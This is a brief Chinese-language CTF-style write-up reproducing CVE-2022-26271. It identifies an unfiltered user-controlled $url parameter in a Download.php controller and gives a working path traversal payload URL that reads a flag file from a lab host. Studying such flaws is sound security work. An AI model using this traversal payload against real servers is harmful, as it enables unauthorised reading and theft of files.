CVE-2022-26271复现
漏洞分析
在\upload\application\index\controller\Download.php里面有一个文件操作函数,其中$url是用户可控制参数,没有过滤,$ourput_filename是要输出的文件名
构造payload:
https://eci-2zegg56pa08ql8s0k42t.cloudeci1.ichunqiu.com/index/download/index?name=index.php&url=../../../../../../../flag
页面会自动下载index.php文件,
